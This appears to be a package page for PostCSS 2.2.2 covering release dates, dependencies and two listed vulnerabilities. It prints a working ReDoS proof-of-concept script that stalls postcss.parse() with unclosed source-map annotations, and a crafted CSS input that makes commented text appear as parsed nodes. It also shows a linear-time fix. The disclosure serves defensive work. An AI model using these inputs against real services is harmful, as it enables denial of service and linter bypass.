PostCSS is a framework for CSS postprocessors with full source map support. Version 2.2.2 is a follow-up to version 2.2.1. Both versions declare the same runtime dependencies, js-base64 and source-map, and the same development dependencies (gulp, cssom, mocha, rework and others), so the development workflow did not change between them. This suggests the update consists of internal improvements and bug fixes rather than new features or changed behaviour.
The versions are under the MIT license and maintained in the same GitHub repository. Both versions are created by Andrey Sitnik.
The key difference is the release date: version 2.2.2 was released on August 27, 2014, five days after version 2.2.1 on August 22, 2014. Such a short interval suggests that 2.2.2 addresses issues found in the preceding version, such as bug fixes, performance improvements or minor compatibility adjustments. Developers already using PostCSS should consider upgrading to 2.2.2 to pick up these refinements. Each version can be retrieved from its registry tarball URL.
All vulnerabilities affecting version 2.2.2 of the package
Regular Expression Denial of Service in postcss
The package postcss in versions before 7.0.36, or between 8.0.0 and 8.2.13, is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
The advisory's proof of concept, which times postcss.parse() on inputs that repeat the annotation opener without ever closing the comment, follows:
    var postcss = require("postcss");

    // build a stylesheet that repeats the annotation opener n times and never closes it
    function build_attack(n) {
        var ret = "a{}";
        for (var i = 0; i < n; i++) {
            ret += "/*# sourceMappingURL=";
        }
        return ret + "!";
    }

    // warm-up parse of a well-formed annotation, then time progressively longer inputs
    postcss.parse('a{}/*# sourceMappingURL=a.css.map */');
    for (var i = 1; i <= 500000; i++) {
        if (i % 1000 == 0) {
            var time = Date.now();
            var attack_str = build_attack(i);
            try {
                postcss.parse(attack_str);
                var time_cost = Date.now() - time;
                console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
            } catch (e) {
                var time_cost = Date.now() - time;
                console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
            }
        }
    }
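As an added illustration (not code from PostCSS or from the advisory), the following contrasts a regex of the shape the advisory describes with a linear-time scanner that recovers the same annotation URL on well-formed input and simply returns null on input that never closes the comment. The leading "#" and the closing "*/" are assumptions used to complete the pattern; they are not quoted from the page.

```javascript
// Added example, not PostCSS's own code. The regex below has the shape the
// advisory describes; the leading "#" and the closing "*/" are assumptions
// used to complete the pattern, not text quoted from the page.
const ANNOTATION_RE = /\/\*\s*# sourceMappingURL=(.*)\s*\*\//;

// Regex extraction: "(.*)" is re-tried for every opener that never closes,
// so cost grows faster than linearly on crafted input.
function annotationUrlRegex(css) {
  const m = ANNOTATION_RE.exec(css);
  return m ? m[1].trim() : null;
}

// Scanner extraction: every character is examined a bounded number of times.
// Returns the URL of the first annotation that is closed by "*/" on the same
// line (or after only whitespace), matching the regex on well-formed input.
function annotationUrlScan(css) {
  const marker = "# sourceMappingURL=";
  let from = 0;
  for (;;) {
    const open = css.indexOf("/*", from);
    if (open === -1) return null;
    let i = open + 2;
    while (i < css.length && /\s/.test(css[i])) i++; // skip whitespace after "/*"
    if (css.startsWith(marker, i)) {
      const urlStart = i + marker.length;
      const close = css.indexOf("*/", urlStart);
      if (close !== -1) {
        const body = css.slice(urlStart, close);
        const nl = body.search(/[\n\r]/);
        // the URL must sit on one line; only whitespace may precede "*/"
        if (nl === -1 || body.slice(nl).trim() === "") return body.trim();
      }
    }
    from = open + 2; // resume at the next comment opener
  }
}

// Both extractors agree on a given input (used to check the scanner).
function extractorsAgree(css) {
  return annotationUrlRegex(css) === annotationUrlScan(css);
}
```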
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters that use PostCSS to parse external, untrusted CSS. An attacker can craft CSS so that parts of it are parsed by PostCSS as a CSS comment, yet after processing they appear in the PostCSS output as CSS nodes (rules, properties) despite originally sitting inside a comment.